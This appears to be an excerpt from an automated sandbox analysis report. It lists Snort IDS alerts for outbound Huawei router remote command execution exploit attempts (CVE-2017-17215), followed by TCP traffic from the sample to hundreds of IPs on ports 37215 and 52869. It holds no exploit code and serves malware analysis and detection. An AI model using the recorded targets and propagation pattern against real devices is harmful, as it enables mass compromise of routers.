                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36180 -> 157.131.171.170:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36180 -> 157.131.171.170:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37552 -> 41.45.136.104:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37552 -> 41.45.136.104:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38548 -> 41.145.104.135:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38548 -> 41.145.104.135:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53120 -> 41.14.60.190:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53120 -> 41.14.60.190:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37830 -> 157.89.217.112:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37830 -> 157.89.217.112:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52708 -> 130.150.233.95:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52708 -> 130.150.233.95:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34452 -> 41.155.35.213:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34452 -> 41.155.35.213:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58576 -> 157.230.63.1:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58576 -> 157.230.63.1:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46100 -> 157.175.25.122:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46100 -> 157.175.25.122:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36208 -> 197.143.99.76:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36208 -> 197.143.99.76:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55942 -> 41.141.203.96:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55942 -> 41.141.203.96:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44754 -> 167.133.59.154:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44754 -> 167.133.59.154:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49742 -> 197.152.249.5:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49742 -> 197.152.249.5:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:60644 -> 106.240.47.148:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:60644 -> 106.240.47.148:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47408 -> 109.251.14.201:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47408 -> 109.251.14.201:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:59524 -> 157.252.199.36:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:59524 -> 157.252.199.36:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56444 -> 50.34.155.192:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56444 -> 50.34.155.192:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43332 -> 41.7.174.17:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43332 -> 41.7.174.17:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43344 -> 41.75.56.150:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43344 -> 41.75.56.150:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:32800 -> 197.122.120.132:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:32800 -> 197.122.120.132:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56896 -> 47.121.106.191:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56896 -> 47.121.106.191:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35268 -> 157.74.195.83:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35268 -> 157.74.195.83:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37482 -> 197.163.208.222:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37482 -> 197.163.208.222:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55138 -> 157.221.219.70:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55138 -> 157.221.219.70:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38402 -> 61.98.235.91:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38402 -> 61.98.235.91:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35550 -> 157.38.118.86:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35550 -> 157.38.118.86:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33732 -> 197.152.47.25:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33732 -> 197.152.47.25:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34146 -> 41.124.231.107:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34146 -> 41.124.231.107:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33442 -> 41.212.223.17:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33442 -> 41.212.223.17:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48960 -> 157.182.60.47:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48960 -> 157.182.60.47:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53578 -> 197.101.55.74:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53578 -> 197.101.55.74:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38920 -> 41.188.190.222:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38920 -> 41.188.190.222:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33088 -> 78.116.111.6:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33088 -> 78.116.111.6:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38972 -> 44.66.223.184:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38972 -> 44.66.223.184:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37000 -> 41.88.139.101:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37000 -> 41.88.139.101:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49980 -> 197.21.229.2:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49980 -> 197.21.229.2:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49302 -> 197.1.71.210:37215
                      Source: global trafficTCP traffic: 149.79.37.237 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 131.78.104.9 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 157.198.219.2 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 176.171.193.242 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 207.28.189.232 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 198.163.171.175 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 132.232.1.40 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 74.170.109.218 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 117.42.61.40 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.165.255.30 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 157.68.215.138 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 131.84.155.33 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 119.83.111.97 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 136.230.51.161 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 204.65.167.10 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 141.199.59.173 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 204.66.149.99 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 158.59.229.105 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.185.62.167 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 106.140.193.219 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 51.192.83.103 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 142.78.152.174 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 190.114.151.234 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.74.40.186 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 115.97.137.57 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 1.94.40.26 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 167.95.218.219 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 8.243.247.217 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 86.142.194.221 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 124.61.165.111 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 134.42.80.231 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 85.92.221.132 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.157.247.234 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 13.103.166.161 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.62.62.113 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 39.204.207.21 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 218.76.143.250 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 219.66.177.143 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.248.234.133 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 41.42.206.73 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 48.191.112.200 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 218.175.31.238 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 120.191.233.247 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 150.186.198.246 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 175.166.165.48 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 58.166.14.49 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.145.253.73 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 115.150.189.67 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 140.47.63.219 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.91.156.105 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 213.75.251.19 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.221.219.70 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 34.133.129.111 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 17.189.220.248 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 196.194.105.55 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 139.130.215.204 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 34.202.46.128 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 185.138.94.75 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 101.86.111.6 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.145.195.153 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 39.176.203.73 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 186.135.28.10 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 18.143.116.51 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.112.53.44 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 143.178.29.251 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.63.2.158 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 73.26.201.192 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 217.10.146.133 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 65.108.13.201 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.165.208.89 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 148.30.198.131 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.167.43.41 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 41.156.206.214 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 89.77.15.240 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 102.126.174.49 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 201.92.64.129 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 122.189.25.105 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 184.126.92.19 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 64.61.239.79 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 12.94.49.225 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 155.49.251.8 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 18.5.132.170 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 36.129.193.156 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 195.182.30.127 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.50.11.183 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 183.106.204.162 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 65.119.53.40 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.152.207.21 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 140.198.134.198 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 104.168.168.224 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 117.42.73.64 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 219.251.58.169 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.122.250.164 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 211.88.161.89 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.40.221.74 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 157.157.49.65 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 201.98.195.221 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 223.250.141.64 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 185.101.34.75 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 99.142.28.231 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 208.190.47.45 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 36.31.128.72 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 1.160.152.237 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 5.253.12.5 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 175.153.54.159 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 9.46.190.218 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 133.28.220.100 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 148.2.12.125 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 180.112.125.192 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 106.240.47.148 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 157.83.28.229 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 157.183.5.146 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 185.193.162.177 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.25.209.247 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 178.79.223.204 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 20.51.35.27 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 73.174.204.179 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.178.185.152 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 187.175.255.52 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 131.172.186.104 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 106.178.32.105 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.23.60.58 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 133.8.172.164 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 98.204.63.160 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 84.28.135.126 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 81.167.63.48 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 31.116.192.251 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.213.57.205 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 197.155.87.199 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 68.85.217.10 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.124.231.107 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 197.237.152.228 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 116.18.86.111 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 90.248.254.246 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 143.165.147.195 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 151.249.104.249 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 133.80.114.131 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 128.53.220.52 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.209.126.105 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 99.80.150.223 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 91.98.242.170 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 105.164.56.144 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 149.255.36.61 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.22.107.208 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 109.251.14.201 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 66.24.201.56 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 87.111.119.131 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 206.64.31.236 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 2.163.63.233 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 158.199.47.135 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 198.80.229.185 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 34.254.39.110 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 165.53.194.234 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 125.66.54.149 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 14.90.249.72 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.13.154.17 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 197.194.43.237 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 41.152.208.190 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 110.110.210.158 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 208.191.39.47 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 104.252.153.132 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 168.103.98.57 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 2.160.137.84 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 179.8.112.110 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 223.12.218.46 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.48.133.159 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 197.122.120.132 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 199.30.2.87 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 40.63.22.218 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 212.239.177.163 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 78.129.211.10 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 219.45.60.7 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 142.28.94.87 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 103.14.70.39 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.129.24.89 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 197.164.78.122 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 31.182.192.107 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 111.8.128.237 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 20.226.134.71 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.163.62.174 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 159.94.41.117 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.180.0.116 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 156.87.172.3 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 78.116.111.6 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 43.52.6.211 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.49.145.149 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 168.85.33.243 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.194.67.142 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 121.248.9.74 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 174.98.61.127 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 31.226.75.152 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 157.16.85.248 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 46.187.173.179 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.98.20.252 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 41.248.125.74 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 77.165.177.101 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 19.97.179.204 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 110.124.171.180 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 41.141.203.96 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 132.253.188.42 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 37.154.117.198 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 4.231.153.224 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 206.53.82.225 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 79.15.211.18 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 42.237.231.247 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.42.169.126 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 219.5.163.32 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 210.93.144.172 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 104.9.38.228 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 204.136.75.160 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 2.202.170.175 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 196.248.250.76 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.33.158.151 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 64.104.54.14 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 74.165.192.1 ports 2,5,6,8,9,52869
